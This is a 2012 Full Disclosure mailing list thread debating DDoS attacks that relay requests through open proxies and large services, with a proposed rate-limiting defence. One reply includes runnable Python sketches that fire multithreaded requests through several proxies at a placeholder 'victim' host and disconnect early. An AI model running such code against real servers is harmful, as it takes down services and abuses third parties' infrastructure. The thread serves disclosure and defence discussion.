Full Disclosure mailing list archives

Re: Arbitrary DDoS PoC


From: adam <adam () papsy net>
Date: Mon, 13 Feb 2012 07:48:32 -0600

I have to admit that I've only read the posts here and haven't actually
followed the link, but in response to Gage:

It depends entirely on how it's being done, specifically: which
services/applications are being targeted and in what way. If he's proxying
through "big" servers such as those owned by Facebook, Google, Wikipedia,
etc., then it definitely does make a difference. You're assuming that his
network speed would be the bottleneck, but to make that assumption you
first have to assume that he's actually waiting around for the response data.

Maybe it's too early in the day to convey this clearly, I don't know.
Here's an example scenario where it would be effective, though: imagine
that you run a web server, and that there's a resource-intensive
(CPU/bandwidth) script/page on that server. For the sake of discussion,
let's assume that my home internet speed is 1/10 of your server's. We can
also probably assume that your server's network speed is 1/10 of Google's.
If I can force Google's servers to request that page, that automatically
puts me at an advantage (especially if I close the connection before
Google can send the response back to me).
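
A rough sketch of that idea in Python (the proxy and target hostnames
below are placeholders, not real systems):

    import socket

    PROXY = ("proxy.example.com", 8080)  # hypothetical open HTTP proxy
    TARGET_HOST = "victim.example.com"   # hypothetical target

    def fire_and_forget():
        s = socket.create_connection(PROXY, timeout=5)
        # Ask the proxy to fetch the expensive page on our behalf.
        s.sendall(("GET http://%s/expensive-page HTTP/1.1\r\n"
                   "Host: %s\r\n"
                   "Connection: close\r\n\r\n"
                   % (TARGET_HOST, TARGET_HOST)).encode())
        s.close()  # hang up before the response ever comes back

The request costs me a few hundred bytes; the proxy and the target pay
for everything that happens after it.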

Even if you're correct about his particular script, the logic behind your
response is flawed. In the above example, one could use multithreading to
cycle requests to your server through Google, Facebook, Wikipedia, whoever.
As soon as a request has been sent, the connection could be terminated.
If that for some reason didn't work, the script could wait until one byte
of the response is received (e.g. the "2" in "200 OK") and close the
connection then. At that point, the bandwidth/resources have already been
spent.
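
A sketch of that variant, again with placeholder hosts: cycle through a
handful of intermediaries from multiple threads and read exactly one byte
of each response before hanging up.

    import itertools
    import socket
    import threading

    PROXIES = [("proxy1.example.com", 8080),  # placeholders,
               ("proxy2.example.com", 8080)]  # not real systems
    TARGET_HOST = "victim.example.com"

    def one_request(proxy):
        try:
            s = socket.create_connection(proxy, timeout=5)
            s.sendall(("GET http://%s/expensive-page HTTP/1.1\r\n"
                       "Host: %s\r\n"
                       "Connection: close\r\n\r\n"
                       % (TARGET_HOST, TARGET_HOST)).encode())
            s.recv(1)  # wait for the first byte of the response only
            s.close()  # the target has already done the work by now
        except socket.error:
            pass

    threads = [threading.Thread(target=one_request, args=(p,))
               for p in itertools.islice(itertools.cycle(PROXIES), 100)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()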

The bottom line is that you could easily use the above concepts (and likely
what the OP has designed) to overpower a server/service while using very
little of your own resources. It's all circumstantial anyway. My overall
point, specifics aside, is that being able to turn Google's or Facebook's
resources against a target is definitely beneficial and has all kinds of
advantages.

On Mon, Feb 13, 2012 at 7:17 AM, Gage Bystrom <themadichib0d () gmail com> wrote:

Uhh... looks pretty standard, boss. You aren't going to DoS a halfway decent
server with that using a single box. Sending your requests through multiple
proxies does not magically increase the resource usage of the target; it's
still your output power vs. their input pipe. Sure, it gives a slight boost
in anonymity and obfuscation, but it does not actually increase
effectiveness. It would even decrease effectiveness, because you bear the
burden of having to send to a proxy, giving the target ample time to
recover from a given request.

Even if you look at it as a tactic to bypass blacklisting, you still
aren't going to overwhelm the server. That means you need more pawns to do
your bidding. This creates a bit of a problem, however, as all your
slaves are then running through a limited selection of proxies, reducing
the number of threats the server needs to blacklist. The circumvention is
quite obvious: don't use proxies for the pawns at all, and rely on sheer
numbers and/or superior resource-exhaustion methods...
 On Feb 13, 2012 4:37 AM, "Lucas Fernando Amorim" <lf.amorim () yahoo com br>
wrote:

With the recent wave of DDoS attacks, one model that has not been
considered is the one where the zombies were never compromised by a
Trojan. In the standard model of a DDoS attack, the machines are
purchased, usually as VPSes, or are captured by Trojans, forming a
botnet. But the arbitrary form of the attack doesn't require acquiring a
collection of computers at all. Existing programs, servers, and protocols
can be made to issue arbitrary requests against the target. P2P programs
are especially vulnerable; so are DNS, internet proxies, and the many
sites that make requests on a user's behalf, such as Facebook or the W3C.

To demonstrate this, I wrote a 60-line proof-of-concept script that can
hit most HTTP servers on the Internet, even those with protections like
mod_security or mod_evasive. It can be found at this link [1] on GitHub.
Solving the problem will require reworking protocols and limiting the
number of concurrent and total requests that proxies and programs may
make to a given site; once the limit is exceeded, a cached copy of the
last response should be returned.

[1] https://github.com/lfamorim/barrelroll
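
As a rough illustration of the kind of limit I mean (the names, window,
and threshold below are only examples, not part of the PoC):

    import time
    from collections import defaultdict

    WINDOW = 60         # seconds
    MAX_REQUESTS = 100  # per client per window (illustrative)
    hits = defaultdict(list)  # client -> request timestamps
    cache = {}                # path -> last response body

    def handle(client, path, render):
        now = time.time()
        hits[client] = [t for t in hits[client] if now - t < WINDOW]
        hits[client].append(now)
        if len(hits[client]) > MAX_REQUESTS and path in cache:
            return cache[path]  # over the limit: serve the cached copy
        body = render(path)     # normal (expensive) rendering
        cache[path] = body
        return body

A real implementation would key on more than the client address, but the
shape is the same: over the limit, the expensive work is never done.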

Cheers,
Lucas Fernando Amorim
http://twitter.com/lfamorim

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
